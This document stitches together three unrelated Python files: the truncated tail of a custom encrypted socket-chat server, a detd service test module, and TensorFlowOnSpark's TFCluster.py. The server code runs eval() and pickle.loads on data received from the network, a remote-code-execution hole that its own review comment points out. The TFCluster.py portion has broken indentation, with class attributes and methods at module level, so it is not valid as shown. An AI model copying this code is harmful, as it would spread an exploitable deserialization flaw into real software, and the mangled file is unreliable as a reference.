                                self.INPUTS.remove(r)
                                if r in self.WRITABLE:
                                    self.WRITABLE.remove(r)
                                r.close()
                                del self.MESSAGE_QUEUES[r]
                                continue
                    else:
                        # payload phase: read the announced number of bytes
                        qwe = list(zip(*data_recv_len))
                        INDEX = qwe[0].index(r)
                        try:
                            recv_len = data_recv_len.pop(INDEX)[1]
                            data = r.recv(recv_len)
                            try:
                                # strip the "0" padding applied by the sender
                                data = data.decode().strip("0").encode("utf-8")
                            except:
                                print("Error in decoding")
                            self.__RECEIVING_MSG.append(data)
                            # first element of the envelope is the username
                            self.MESSAGE_QUEUES[r].put(pickle.loads(base64.b64decode(data))[0])
                            if r not in self.OUTPUTS:
                                self.OUTPUTS.append(r)
                        except Exception as e:
                            print("User Disconnected")
                            readable.remove(r)
                            self.INPUTS.remove(r)
                            writable.remove(r)
                            self.OUTPUTS.remove(r)
                            if r in self.WRITABLE:
                                self.WRITABLE.remove(r)
                            del self.MESSAGE_QUEUES[r]
                            continue
            # handling the outputs
            for w in writable:
                if w not in self.WRITABLE:
                    self.WRITABLE.append(w)
            # handling the errors
            for e in exceptions:
                self.INPUTS.remove(e)
                if e in self.OUTPUTS:
                    self.OUTPUTS.remove(e)
                e.close()
                del self.MESSAGE_QUEUES[e]

    def receive_func(self, __receiving_msg, __varified_devices, __varifier_lst, __client_keys, __outputs, __request_lst, __request_res_lst, __message_lst, __custom_c_m_r):
        """Worker thread: decrypt queued inbound frames and route them.

        Every parameter aliases one of the instance's shared lists/dicts
        (mutated in place so the select loop and sender see the updates):
        ``__receiving_msg`` raw frames from __server; handshake state in
        ``__varified_devices``/``__varifier_lst``/``__client_keys``; outbound
        routing queues ``__request_lst``/``__request_res_lst``/``__message_lst``;
        ``__custom_c_m_r`` received custom-channel payloads for LISTEN().
        """
        while True:
            try:
                for INDEX, _data_ in enumerate(__receiving_msg):
                    data = pickle.loads(base64.b64decode(_data_))
                    if data[0] not in __varified_devices:
                        # unverified sender: only the key-exchange handshake is accepted
                        _recv_ = DSP()._convert_to_class(_data_, secure=False)
                        if _recv_.DSP_type == "username_secure":
                            # SECURITY(review): eval/pickle on network data — any
                            # peer knowing the universal key can execute code here.
                            resolved_data = eval(_recv_.msg)
                            # mint a per-client AES-GCM key pack
                            aes_key = AESGCM.generate_key(256)
                            nonce = os.urandom(32)
                            aad = bytes(self._name_generator(), "utf-8")
                            qw = {
                                "aes_key": aes_key,
                                "nonce": nonce,
                                "aad": aad,
                            }
                            pickle_qw = pickle.dumps(qw)
                            b64_aes_key_pack = base64.b64encode(pickle_qw)
                            # encrypt the key pack with the client's SSH public key
                            key = load_ssh_public_key(
                                bytes(
                                    resolved_data["data"],
                                    "utf-8"
                                ),
                                backend=default_backend()
                            )
                            ciphertext = key.encrypt(
                                b64_aes_key_pack,
                                padding.OAEP(
                                    mgf=padding.MGF1(algorithm=hashes.SHA256()),
                                    algorithm=hashes.SHA256(),
                                    label=None
                                )
                            )
                            ciphertext = base64.b64encode(ciphertext)
                            prepare_data = {"key": ciphertext}
                            dsp_data = DSP(
                                DSP_type="username_secure_response"
                            )._messanger(
                                MSG=prepare_data
                            )
                            dsp_data = [resolved_data["username"], dsp_data]
                            __varifier_lst.append(dsp_data)
                            __varified_devices.append(resolved_data["username"])
                            __client_keys[resolved_data["username"]] = b64_aes_key_pack
                            # persist the (merged) key map under the sha256("key") node
                            get = self._get_node(
                                file=self.__file_location,
                                key=hashlib.sha256(bytes("key", "utf-8")).digest(),
                                wait=False
                            )
                            if get is not None:
                                get[resolved_data["username"]] = b64_aes_key_pack
                                self._add_node(
                                    file=self.__file_location,
                                    node=[
                                        hashlib.sha256(bytes("key", "utf-8")).digest(),
                                        get
                                    ]
                                )
                            else:
                                self._add_node(
                                    file=self.__file_location,
                                    node=[
                                        hashlib.sha256(bytes("key", "utf-8")).digest(),
                                        {
                                            resolved_data["username"]: b64_aes_key_pack
                                        }
                                    ]
                                )
                            __receiving_msg.pop(INDEX)
                    else:
                        # verified sender: decrypt with its per-client key pack
                        aes_key_pack = __client_keys[data[0]]
                        _recv_ = DSP()._convert_to_class(
                            OBJECT=_data_,
                            secure=True,
                            secure_dict=aes_key_pack
                        )
                        if _recv_.DSP_type == "DSP_REQ":
                            try:
                                resolved_data = eval(_recv_.msg)
                                resolved_data = pickle.loads(base64.b64decode(eval(_recv_.msg)))
                                __request_lst.append(
                                    [
                                        resolved_data["target_name"],
                                        _recv_.msg
                                    ]
                                )
                                __receiving_msg.remove(_data_)
                            except:
                                pass
                        elif _recv_.DSP_type == "DSP_REQ_RES":
                            try:
                                resolved_data = pickle.loads(base64.b64decode(eval(_recv_.msg)))
                                __request_res_lst.append(
                                    [
                                        resolved_data["target_name"],
                                        _recv_.msg
                                    ]
                                )
                                __receiving_msg.remove(_data_)
                            except:
                                pass
                        elif _recv_.DSP_type == "DSP_MSG":
                            try:
                                resolved_data = pickle.loads(base64.b64decode(eval(_recv_.msg)))
                                __message_lst.append(
                                    [
                                        resolved_data['target_name'],
                                        _recv_.msg
                                    ]
                                )
                                __receiving_msg.remove(_data_)
                            except:
                                pass
                        elif _recv_.DSP_type in self.__CUSTOM_CHANNEL:
                            try:
                                resolved_data = pickle.loads(base64.b64decode(eval(_recv_.msg)))
                                __custom_c_m_r.append(resolved_data)
                                __receiving_msg.remove(_data_)
                            except:
                                pass
            except:
                # NOTE(review): broad swallow keeps the thread alive but hides
                # every error, including handshake failures.
                pass

    def send_func(self, Writable, message_q, message_list, requestList, requestResList, varifierList, customChannelMessageSend):
        """Worker thread: drain the outbound queues to each writable socket.

        For every writable socket, peek its username from MESSAGE_QUEUES, then
        deliver queued message/request/response/handshake/custom payloads
        addressed to that username, each preceded by a 16-byte '|'-padded
        length header.
        """
        while True:
            for s in Writable:
                # drop sockets that were closed elsewhere
                if s._closed == True and s.fileno() == -1:
                    Writable.remove(s)
                try:
                    # peek the username owning this socket (get + put back)
                    username = message_q[s].get_nowait()
                    message_q[s].put(username)
                    # transpose [[target, payload], ...] into ([targets], [payloads])
                    msg_lst = list(list(zip(*message_list)))
                    req_lst = list(list(zip(*requestList)))
                    req_res_lst = list(list(zip(*requestResList)))
                    vari_lst = list(list(zip(*varifierList)))
                    send_c_msg = list(zip(*customChannelMessageSend))
                except KeyError:
                    # NOTE(review): if this fires on the first iteration the
                    # *_lst names below are unbound (NameError kills the thread);
                    # queue.Empty from get_nowait() is likewise not handled.
                    pass
                if len(msg_lst) > 0:
                    if username in msg_lst[0]:
                        INDEX = msg_lst[0].index(username)
                        aes_key_pack = self.__CLIENT_KEYS[username]
                        aes_key_pack = pickle.loads(base64.b64decode(aes_key_pack))
                        # payload is '|'-centered; header carries the padded length
                        dsp_data = DSP(
                            DSP_type="DSP_MSG",
                            universalAesKey=aes_key_pack["aes_key"],
                            nonce=aes_key_pack["nonce"],
                            aad=aes_key_pack["aad"]
                        )._messanger(
                            MSG=f"{msg_lst[1][INDEX]}"
                        ).decode().center(len(msg_lst[1][INDEX]) + 100, "|").encode("utf-8")
                        try:
                            s.send(bytes(f"{len(dsp_data)}".center(16, "|"), "utf-8"))
                            s.send(
                                dsp_data
                            )
                            message_list.pop(INDEX)
                        except OSError:
                            pass
                if len(req_lst) > 0:
                    if username in req_lst[0]:
                        INDEX = req_lst[0].index(username)
                        try:
                            aes_key_pack = self.__CLIENT_KEYS[username]
                        except KeyError:
                            continue
                        aes_key_pack = pickle.loads(base64.b64decode(aes_key_pack))
                        dsp_data = DSP(
                            DSP_type="DSP_handshake_request",
                            universalAesKey=aes_key_pack["aes_key"],
                            nonce=aes_key_pack["nonce"],
                            aad=aes_key_pack["aad"]
                        )._messanger(
                            MSG=f"{req_lst[1][INDEX]}"
                        ).decode().center(len(req_lst[1][INDEX]) + 100, "|").encode("utf-8")
                        # NOTE(review): header advertises len+100 here (unlike the
                        # DSP_MSG branch above) — confirm the client compensates.
                        s.send(bytes(f"{len(dsp_data)+100}".center(16, "|"), "utf-8"))
                        s.send(
                            dsp_data
                        )
                        requestList.pop(INDEX)
                if len(req_res_lst) > 0:
                    if username in req_res_lst[0]:
                        INDEX = req_res_lst[0].index(username)
                        aes_key_pack = self.__CLIENT_KEYS[username]
                        aes_key_pack = pickle.loads(base64.b64decode(aes_key_pack))
                        dsp_data = DSP(
                            DSP_type="DSP_handshake_request_res",
                            universalAesKey=aes_key_pack["aes_key"],
                            nonce=aes_key_pack["nonce"],
                            aad=aes_key_pack["aad"]
                        )._messanger(
                            MSG=f"{req_res_lst[1][INDEX]}"
                        ).decode().center(len(req_res_lst[1][INDEX]) + 100, "|").encode("utf-8")
                        s.send(bytes(f"{len(dsp_data)+100}".center(16, "|"), "utf-8"))
                        s.send(
                            dsp_data
                        )
                        requestResList.pop(INDEX)
                if len(vari_lst) > 0:
                    if username in vari_lst[0]:
                        # handshake responses are pre-encrypted; send verbatim
                        INDEX = vari_lst[0].index(username)
                        s.send(bytes(f"{len(vari_lst[1][INDEX])}".center(16, "|"), "utf-8"))
                        s.send(
                            vari_lst[1][INDEX]
                        )
                        varifierList.pop(INDEX)
                if len(send_c_msg) > 0:
                    if username in send_c_msg[0]:
                        INDEX = send_c_msg[0].index(username)
                        s.send(bytes(f"{len(send_c_msg[1][INDEX])}".center(16, "|"), "utf-8"))
                        s.send(send_c_msg[1][INDEX])
                        customChannelMessageSend.pop(INDEX)

    def CREATE_CHANNEL(self, channel_name=None, multiple: bool = False):
        """Register one custom channel name (or a list of them when multiple=True).

        :raises TypeError: when multiple=True but channel_name is not a list.
        """
        if multiple:
            if type(channel_name) == type([]):
                for channel in channel_name:
                    if channel not in self.__CUSTOM_CHANNEL:
                        self.__CUSTOM_CHANNEL.append(channel)
                    else:
                        print(f"Channel : {channel} already exists.")
            else:
                raise TypeError("When 'mutliple' is to True then channel_name should be a list of multiple channel names")
        else:
            if channel_name not in self.__CUSTOM_CHANNEL:
                self.__CUSTOM_CHANNEL.append(channel_name)

    def LISTEN(self, channel: str = None, function: object = None, args=None):
        """Queue `function` for one pending message received on `channel`.

        The matched message is popped from the receive buffer and prepended to
        `args`; the call itself happens on the __callback_loop thread.

        :raises TypeError: when channel is None.
        """
        if channel is not None:
            found = False
            index = None
            if channel in self.__CUSTOM_CHANNEL:
                for i, d in enumerate(self.__CUSTOM_CHANNEL_MSG_REC):
                    if d["channel"] == channel:
                        found = True
                        index = i
                        break
            if found:
                if args is None:
                    p_data = self.__CUSTOM_CHANNEL_MSG_REC.pop(index)
                    self.__CALLBACK_LOOP.append([function, [p_data]])
                else:
                    p_data = self.__CUSTOM_CHANNEL_MSG_REC.pop(index)
                    args = list(args)
                    args.insert(0, p_data)
                    self.__CALLBACK_LOOP.append([function, args])
        else:
            raise TypeError("'channel' should not be None")

    def __callback_loop(self, __callback_loop):
        """Worker thread: pop queued [callable, args] pairs and invoke them.

        NOTE(review): popping while enumerating skips every other entry when
        more than one callback is queued at once — confirm acceptable.
        """
        while True:
            for index, func in enumerate(__callback_loop):
                __callback_loop.pop(index)
                func[0](*func[1])

    def SEND(self, channel_name, target_name, data):
        """Encrypt `data` for `target_name` and queue it on a custom channel.

        Silently does nothing when `channel_name` was never registered.
        """
        if channel_name in self.__CUSTOM_CHANNEL:
            key_pack = self.__CLIENT_KEYS[target_name]
            key_pack = pickle.loads(base64.b64decode(key_pack))
            dsp_data = DSP(
                DSP_type=channel_name,
                universalAesKey=key_pack["aes_key"],
                nonce=key_pack["nonce"],
                aad=key_pack["aad"]
            )._messanger(
                MSG=base64.b64encode(pickle.dumps(data))
            )
            self.__CUSTOM_CHANNEL_MSG_SEND.append(
                [
                    target_name,
                    dsp_data
                ]
            )
class server():
    """Thin public facade over MAIN, exposing only the supported entry points."""

    def __init__(self, secure: bool = True, file: str = None):
        """Create a multi-client server backed by a MAIN instance.

        :param secure: keep at the default True.
        :param file: path to a yaml file persisting keys and configuration;
            omitting it raises TypeError.
        """
        if not file:
            raise TypeError("asyncServer() missing 1 required positional argument: 'file'")
        backend = MAIN(secure=secure, file=file)
        # Re-export only the public API; the MAIN instance itself stays hidden.
        self.SERVER = backend.SERVER
        self.CREATE_CHANNEL = backend.CREATE_CHANNEL
        self.LISTEN = backend.LISTEN
        self.SEND = backend.SEND
|
test_service.py | #!/usr/bin/env python3
# SPDX-License-Identifier: BSD-3-Clause
# Copyright(C) 2020-2022 Intel Corporation
# Authors:
# Hector Blanco Alcaine
import multiprocessing
import os
import socket
import sys
import time
import unittest
import unittest.mock
from detd import StreamConfiguration
from detd import TrafficSpecification
from detd import Service
from detd import ServiceProxy
from .common import *
def setup_configuration():
    """Build the canonical fixture shared by the service tests.

    Returns the interface name plus a StreamConfiguration / TrafficSpecification
    pair describing a 20 ms cycle of 1522-byte frames at txoffset 250 us,
    addressed to VLAN 3 with PCP 6.
    """
    iface = "eth0"
    period_ns = 20 * 1000 * 1000   # 20 ms cycle, in ns
    frame_bytes = 1522
    offset_ns = 250 * 1000         # 250 us transmission offset, in ns
    dst_mac = "03:C0:FF:EE:FF:AB"
    vlan_id = 3
    pcp_prio = 6
    stream = StreamConfiguration(dst_mac, vlan_id, pcp_prio, offset_ns)
    traffic = TrafficSpecification(period_ns, frame_bytes)
    return iface, stream, traffic
def setup_proxy():
    """Return a fresh ServiceProxy for talking to the detd service."""
    return ServiceProxy()
def run_server(test_mode):
    """Child-process entry point: run the detd Service until terminated."""
    if test_mode == TestMode.TARGET:
        service = Service()
    elif test_mode == TestMode.HOST:
        # host runs do not touch real hardware
        service = Service(test_mode=True)
    else:
        return
    with service as srv:
        srv.run()
def setup_server(test_mode):
    """Spawn the Service in a child process and block until it is reachable.

    Readiness is detected by polling for the service's lock file.
    """
    ready_marker = Service._SERVICE_LOCK_FILE
    proc = multiprocessing.Process(target=run_server, args=(test_mode,))
    proc.start()
    while not os.path.exists(ready_marker):
        time.sleep(0.2)
    return proc
def mock_setup(self, message):
    """Stand-in for the service's setup handler.

    Derives the VLAN interface name from the request and returns it together
    with a fixed socket priority of 6.
    """
    return "{}.{}".format(message.interface, message.vid), 6
class TestService(unittest.TestCase):
    """End-to-end tests driving a real Service process through ServiceProxy."""

    def setUp(self):
        # DETD_TESTENV selects target hardware vs. host emulation; default HOST.
        env_var = os.getenv("DETD_TESTENV")
        if env_var == "HOST":
            self.mode = TestMode.HOST
        elif env_var == "TARGET":
            self.mode = TestMode.TARGET
        else:
            self.mode = TestMode.HOST
        self.server = setup_server(self.mode)
        self.proxy = setup_proxy()

    def tearDown(self):
        # Stop the service process and remove its leftover unix socket, if any.
        self.server.terminate()
        self.server.join()
        try:
            uds_address = '/tmp/uds_detd_server.sock'
            os.unlink(uds_address)
        except FileNotFoundError:
            pass

    def assertSoprioEqual(self, sock, soprio):
        """Assert that the socket's SO_PRIORITY option equals `soprio`."""
        actual = sock.getsockopt(socket.SOL_SOCKET, socket.SO_PRIORITY)
        self.assertEqual(actual, soprio)

    def test_service_setup_talker_socket(self):
        interface_name, stream, traffic = setup_configuration()
        sock = self.proxy.setup_talker_socket(interface_name, stream, traffic)
        # XXX currently this is just testing that the socket priority
        # configured by the server is correctly propagated with SCM_RIGHTS
        self.assertSoprioEqual(sock, 6)
        sock.close()

    def test_service_setup_talker(self):
        interface_name, stream, traffic = setup_configuration()
        vlan_interface, soprio = self.proxy.setup_talker(interface_name, stream, traffic)
        self.assertEqual(vlan_interface, "eth0.3")
        # NOTE(review): expects soprio 7 while mock_setup in this module returns
        # 6 — confirm which path the service takes in this mode.
        self.assertEqual(soprio, 7)
# Allow running this test module directly, outside a pytest/unittest runner.
if __name__ == '__main__':
    unittest.main()
|
TFCluster.py | # Copyright 2017 Yahoo Inc.
# Licensed under the terms of the Apache 2.0 license.
# Please see LICENSE file in the project root for terms.
"""
This module provides a high-level API to manage the TensorFlowOnSpark cluster.
There are three main phases of operation:
1. **Reservation/Startup** - reserves a port for the TensorFlow process on each executor, starts a multiprocessing.Manager to
listen for data/control messages, and then launches the Tensorflow main function on the executors.
2. **Data feeding** - *For InputMode.SPARK only*. Sends RDD data to the TensorFlow nodes via each executor's multiprocessing.Manager. PS
nodes will tie up their executors, so they won't receive any subsequent data feeding tasks.
3. **Shutdown** - sends a shutdown control message to the multiprocessing.Managers of the PS nodes and pushes end-of-feed markers into the data
queues of the worker nodes.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import nested_scopes
from __future__ import print_function
import logging
import os
import random
import signal
import sys
import threading
import time
from pyspark.streaming import DStream
from . import reservation
from . import TFManager
from . import TFSparkNode
# Status of the TF background job, shared with the run/shutdown logic;
# the presence of an 'error' key signals that the TensorFlow job failed.
tf_status = {}
class InputMode(object):
    """Enum for the input modes of data feeding."""
    TENSORFLOW = 0  #: TensorFlow application is responsible for reading any data.
    SPARK = 1  #: Spark is responsible for feeding data to the TensorFlow application via an RDD.
class TFCluster(object):
sc = None #: SparkContext
defaultFS = None #: Default FileSystem string, e.g. ``file://`` or ``hdfs://<namenode>/``
working_dir = None #: Current working directory
num_executors = None #: Number of executors in the Spark job (and therefore, the number of nodes in the TensorFlow cluster).
nodeRDD = None #: RDD representing the nodes of the cluster, i.e. ``sc.parallelize(range(num_executors), num_executors)``
cluster_id = None #: Unique ID for this cluster, used to invalidate state for new clusters.
cluster_info = None #: Cluster node reservations
cluster_meta = None #: Cluster metadata dictionary, e.g. cluster_id, defaultFS, reservation.Server address, etc.
input_mode = None #: TFCluster.InputMode for this cluster
queues = None #: *INTERNAL_USE*
server = None #: reservation.Server for this cluster
    def train(self, dataRDD, num_epochs=0, feed_timeout=600, qname='input'):
        """*For InputMode.SPARK only*. Feeds Spark RDD partitions into the TensorFlow worker nodes
        It is the responsibility of the TensorFlow "main" function to interpret the rows of the RDD.
        Since epochs are implemented via ``RDD.union()`` and the entire RDD must generally be processed in full, it is recommended
        to set ``num_epochs`` to closely match your training termination condition (e.g. steps or accuracy). See ``TFNode.DataFeed``
        for more details.
        Args:
          :dataRDD: input data as a Spark RDD or DStream.
          :num_epochs: number of times to repeat the dataset during training.
          :feed_timeout: number of seconds after which data feeding times out (600 sec default)
          :qname: *INTERNAL USE*.
        """
        logging.info("Feeding training data")
        assert self.input_mode == InputMode.SPARK, "TFCluster.train() requires InputMode.SPARK"
        assert qname in self.queues, "Unknown queue: {}".format(qname)
        assert num_epochs >= 0, "num_epochs cannot be negative"
        if isinstance(dataRDD, DStream):
            # Spark Streaming: feed each micro-batch RDD as it arrives
            dataRDD.foreachRDD(lambda rdd: rdd.foreachPartition(TFSparkNode.train(self.cluster_info, self.cluster_meta, feed_timeout=feed_timeout, qname=qname)))
        else:
            # Spark RDD
            # if num_epochs unspecified, pick an arbitrarily "large" number for now
            # TODO: calculate via dataRDD.count() / batch_size / max_steps
            if num_epochs == 0:
                num_epochs = 10
            # epochs are emulated by unioning the RDD with itself num_epochs times
            rdds = [dataRDD] * num_epochs
            unionRDD = self.sc.union(rdds)
            unionRDD.foreachPartition(TFSparkNode.train(self.cluster_info, self.cluster_meta, feed_timeout=feed_timeout, qname=qname))
    def inference(self, dataRDD, feed_timeout=600, qname='input'):
        """*For InputMode.SPARK only*: Feeds Spark RDD partitions into the TensorFlow worker nodes and returns an RDD of results
        It is the responsibility of the TensorFlow "main" function to interpret the rows of the RDD and provide valid data for the output RDD.
        This will use the distributed TensorFlow cluster for inferencing, so the TensorFlow "main" function should be capable of inferencing.
        Per Spark design, the output RDD will be lazily-executed only when a Spark action is invoked on the RDD.
        Args:
          :dataRDD: input data as a Spark RDD
          :feed_timeout: number of seconds after which data feeding times out (600 sec default)
          :qname: *INTERNAL_USE*
        Returns:
          A Spark RDD representing the output of the TensorFlow inferencing
        """
        logging.info("Feeding inference data")
        assert self.input_mode == InputMode.SPARK, "TFCluster.inference() requires InputMode.SPARK"
        assert qname in self.queues, "Unknown queue: {}".format(qname)
        # lazily maps each partition through the per-node inference feeder
        return dataRDD.mapPartitions(TFSparkNode.inference(self.cluster_info, feed_timeout=feed_timeout, qname=qname))
def shutdown(self, ssc=None, grace_secs=0, timeout=259200):
  """Stops the distributed TensorFlow cluster.

  For InputMode.SPARK, this will be executed AFTER the `TFCluster.train()` or `TFCluster.inference()` method completes.
  For InputMode.TENSORFLOW, this will be executed IMMEDIATELY after `TFCluster.run()` and will wait until the TF worker nodes complete.

  Args:
    :ssc: *For Streaming applications only*. Spark StreamingContext
    :grace_secs: Grace period to wait after all executors have completed their tasks before terminating the Spark application, e.g. to allow the chief worker to perform any final/cleanup duties like exporting or evaluating the model. Default is 0.
    :timeout: Time in seconds to wait for TF cluster to complete before terminating the Spark application. This can be useful if the TF code hangs for any reason. Default is 3 days. Use -1 to disable timeout.
  """
  logging.info("Stopping TensorFlow nodes")
  # identify ps/workers
  # Partition cluster nodes by role; the conditional-expression chain appends
  # each node to exactly one of the three lists.
  ps_list, worker_list, eval_list = [], [], []
  for node in self.cluster_info:
    (ps_list if node['job_name'] == 'ps' else eval_list if node['job_name'] == 'evaluator' else worker_list).append(node)
  # setup execution timeout
  # NOTE(review): the SIGALRM alarm is never cancelled with signal.alarm(0)
  # after a clean shutdown — presumably acceptable because the process exits
  # shortly after; confirm before relying on this method mid-application.
  if timeout > 0:
    def timeout_handler(signum, frame):
      # Hard-exit path: cancel all Spark work and terminate the driver.
      logging.error("TensorFlow execution timed out, exiting Spark application with error status")
      self.sc.cancelAllJobs()
      self.sc.stop()
      sys.exit(1)
    signal.signal(signal.SIGALRM, timeout_handler)
    signal.alarm(timeout)
  # wait for Spark Streaming termination or TF app completion for InputMode.TENSORFLOW
  if ssc is not None:
    # Spark Streaming: poll once per second until the TF server reports done,
    # then stop the StreamingContext (keeping the SparkContext alive).
    while not ssc.awaitTerminationOrTimeout(1):
      if self.server.done:
        logging.info("Server done, stopping StreamingContext")
        ssc.stop(stopSparkContext=False, stopGraceFully=True)
        break
  elif self.input_mode == InputMode.TENSORFLOW:
    # in TENSORFLOW mode, there is no "data feeding" job, only a "start" job, so we must wait for the TensorFlow workers
    # to complete all tasks, while accounting for any PS tasks which run indefinitely.
    # Require seeing the "only PS/evaluator tasks remain" condition 3 times
    # (sampled every 5s) before concluding the workers are finished.
    count = 0
    while count < 3:
      st = self.sc.statusTracker()
      jobs = st.getActiveJobsIds()
      if len(jobs) == 0:
        break
      stages = st.getActiveStageIds()
      for i in stages:
        si = st.getStageInfo(i)
        if si.numActiveTasks == len(ps_list) + len(eval_list):
          # if we only have PS tasks left, check that we see this condition a couple times
          count += 1
      time.sleep(5)
  # shutdown queues and managers for "worker" executors.
  # note: in SPARK mode, this job will immediately queue up behind the "data feeding" job.
  # in TENSORFLOW mode, this will only run after all workers have finished.
  workers = len(worker_list)
  workerRDD = self.sc.parallelize(range(workers), workers)
  workerRDD.foreachPartition(TFSparkNode.shutdown(self.cluster_info, self.queues))
  time.sleep(grace_secs)
  # exit Spark application w/ err status if TF job had any errors
  # NOTE(review): `tf_status` is not defined in this method — presumably a
  # module-level dict populated by the background `_start` thread in run();
  # verify against the module top.
  if 'error' in tf_status:
    logging.error("Exiting Spark application with error status.")
    self.sc.cancelAllJobs()
    self.sc.stop()
    sys.exit(1)
  logging.info("Shutting down cluster")
  # shutdown queues and managers for "PS" executors.
  # note: we have to connect/shutdown from the spark driver, because these executors are "busy" and won't accept any other tasks.
  for node in ps_list + eval_list:
    addr = node['addr']
    authkey = node['authkey']
    m = TFManager.connect(addr, authkey)
    q = m.get_queue('control')
    # A None message is the sentinel telling the node's control loop to stop.
    q.put(None)
    q.join()
  # wait for all jobs to finish
  while True:
    time.sleep(5)
    st = self.sc.statusTracker()
    jobs = st.getActiveJobsIds()
    if len(jobs) == 0:
      break
def tensorboard_url(self):
  """Return the TensorBoard URL for this cluster, or None if no node runs TensorBoard."""
  tb_nodes = (n for n in self.cluster_info if n['tb_port'] != 0)
  node = next(tb_nodes, None)
  if node is None:
    return None
  return "http://{0}:{1}".format(node['host'], node['tb_port'])
def run(sc, map_fun, tf_args, num_executors, num_ps, tensorboard=False, input_mode=InputMode.TENSORFLOW,
        log_dir=None, driver_ps_nodes=False, master_node=None, reservation_timeout=600, queues=['input', 'output', 'error'],
        eval_node=False):
  """Starts the TensorFlowOnSpark cluster and Runs the TensorFlow "main" function on the Spark executors

  Args:
    :sc: SparkContext
    :map_fun: user-supplied TensorFlow "main" function
    :tf_args: ``argparse`` args, or command-line ``ARGV``. These will be passed to the ``map_fun``.
    :num_executors: number of Spark executors. This should match your Spark job's ``--num_executors``.
    :num_ps: number of Spark executors which are reserved for TensorFlow PS nodes. All other executors will be used as TensorFlow worker nodes.
    :tensorboard: boolean indicating if the chief worker should spawn a Tensorboard server.
    :input_mode: TFCluster.InputMode
    :log_dir: directory to save tensorboard event logs. If None, defaults to a fixed path on local filesystem.
    :driver_ps_nodes: run the PS nodes on the driver locally instead of on the spark executors; this help maximizing computing resources (esp. GPU). You will need to set cluster_size = num_executors + num_ps
    :master_node: name of the "master" or "chief" node in the cluster_template, used for `tf.estimator` applications.
    :reservation_timeout: number of seconds after which cluster reservation times out (600 sec default)
    :queues: *INTERNAL_USE*  (NOTE: mutable default is read-only here, so it is safe, but callers should not mutate it)
    :eval_node: run evaluator node for distributed Tensorflow

  Returns:
    A TFCluster object representing the started cluster.
  """
  logging.info("Reserving TFSparkNodes {0}".format("w/ TensorBoard" if tensorboard else ""))
  if driver_ps_nodes and input_mode != InputMode.TENSORFLOW:
    raise Exception('running PS nodes on driver locally is only supported in InputMode.TENSORFLOW')
  if eval_node and input_mode != InputMode.TENSORFLOW:
    raise Exception('running evaluator nodes is only supported in InputMode.TENSORFLOW')

  # compute size of TF cluster and validate against number of Spark executors
  num_master = 1 if master_node else 0
  num_eval = 1 if eval_node else 0
  num_workers = max(num_executors - num_ps - num_eval - num_master, 0)
  total_nodes = num_ps + num_master + num_eval + num_workers
  assert total_nodes == num_executors, "TensorFlow cluster requires {} nodes, but only {} executors available".format(total_nodes, num_executors)
  assert num_master + num_workers > 0, "TensorFlow cluster requires at least one worker or master/chief node"

  # create a cluster template for scheduling TF nodes onto executors:
  # executor indices are consumed in order: ps, master/chief, evaluator, workers.
  executors = list(range(num_executors))
  cluster_template = {}
  if num_ps > 0:
    cluster_template['ps'] = executors[:num_ps]
    del executors[:num_ps]
  if master_node:
    cluster_template[master_node] = executors[:1]
    del executors[:1]
  if eval_node:
    cluster_template['evaluator'] = executors[:1]
    del executors[:1]
  if num_workers > 0:
    cluster_template['worker'] = executors[:num_workers]
  logging.info("cluster_template: {}".format(cluster_template))

  # get default filesystem from spark
  defaultFS = sc._jsc.hadoopConfiguration().get("fs.defaultFS")
  # strip trailing "root" slash from "file:///" to be consistent w/ "hdfs://..."
  if defaultFS.startswith("file://") and len(defaultFS) > 7 and defaultFS.endswith("/"):
    defaultFS = defaultFS[:-1]

  # get current working dir of spark launch
  working_dir = os.getcwd()

  # start a server to listen for reservations and broadcast cluster_spec
  server = reservation.Server(num_executors)
  server_addr = server.start()

  # start TF nodes on all executors
  logging.info("Starting TensorFlow on executors")
  cluster_meta = {
    'id': random.getrandbits(64),
    'cluster_template': cluster_template,
    'num_executors': num_executors,
    'default_fs': defaultFS,
    'working_dir': working_dir,
    'server_addr': server_addr
  }
  if driver_ps_nodes:
    nodeRDD = sc.parallelize(range(num_ps, num_executors), num_executors - num_ps)
  else:
    nodeRDD = sc.parallelize(range(num_executors), num_executors)

  if driver_ps_nodes:
    def _start_ps(node_index):
      """Run a single PS node in-process on the Spark driver."""
      logging.info("starting ps node locally %d" % node_index)
      TFSparkNode.run(map_fun,
                      tf_args,
                      cluster_meta,
                      tensorboard,
                      log_dir,
                      queues,
                      background=(input_mode == InputMode.SPARK))([node_index])
    for i in cluster_template['ps']:
      # BUGFIX: pass the index via args instead of closing over the loop
      # variable with `lambda: _start_ps(i)` — the lambda binds `i` late, so
      # threads could all start with the final loop value.
      ps_thread = threading.Thread(target=_start_ps, args=(i,))
      ps_thread.daemon = True
      ps_thread.start()

  # start TF on a background thread (on Spark driver) to allow for feeding job
  def _start(status):
    """Launch the TF nodes via a Spark job; record any failure in `status`."""
    try:
      nodeRDD.foreachPartition(TFSparkNode.run(map_fun,
                                               tf_args,
                                               cluster_meta,
                                               tensorboard,
                                               log_dir,
                                               queues,
                                               background=(input_mode == InputMode.SPARK)))
    except Exception as e:
      logging.error("Exception in TF background thread")
      status['error'] = str(e)

  # NOTE: `tf_status` is a module-level dict shared with TFCluster.shutdown().
  t = threading.Thread(target=_start, args=(tf_status,))
  # run as daemon thread so that in spark mode main thread can exit
  # if feeder spark stage fails and main thread can't do explicit shutdown
  t.daemon = True
  t.start()

  # wait for executors to register and start TFNodes before continuing
  logging.info("Waiting for TFSparkNodes to start")
  cluster_info = server.await_reservations(sc, tf_status, reservation_timeout)
  logging.info("All TFSparkNodes started")

  # print cluster_info and extract TensorBoard URL
  tb_url = None
  for node in cluster_info:
    logging.info(node)
    if node['tb_port'] != 0:
      tb_url = "http://{0}:{1}".format(node['host'], node['tb_port'])
  if tb_url is not None:
    logging.info("========================================================================================")
    logging.info("")
    logging.info("TensorBoard running at: {0}".format(tb_url))
    logging.info("")
    logging.info("========================================================================================")

  # since our "primary key" for each executor's TFManager is (host, executor_id), sanity check for duplicates
  # Note: this may occur if Spark retries failed Python tasks on the same executor.
  seen_node_ids = set()
  for node in cluster_info:
    node_id = (node['host'], node['executor_id'])
    if node_id in seen_node_ids:
      # BUGFIX: item 3 previously read "3," — corrected to "3." for consistency.
      msg = '''
Duplicate cluster node id detected (host={0}, executor_id={1})
Please ensure that:
1. Number of executors >= number of TensorFlow nodes
2. Number of tasks per executors is 1
3. TFCluster.shutdown() is successfully invoked when done.
'''.strip()
      raise Exception(msg.format(node_id[0], node_id[1]))
    else:
      seen_node_ids.add(node_id)

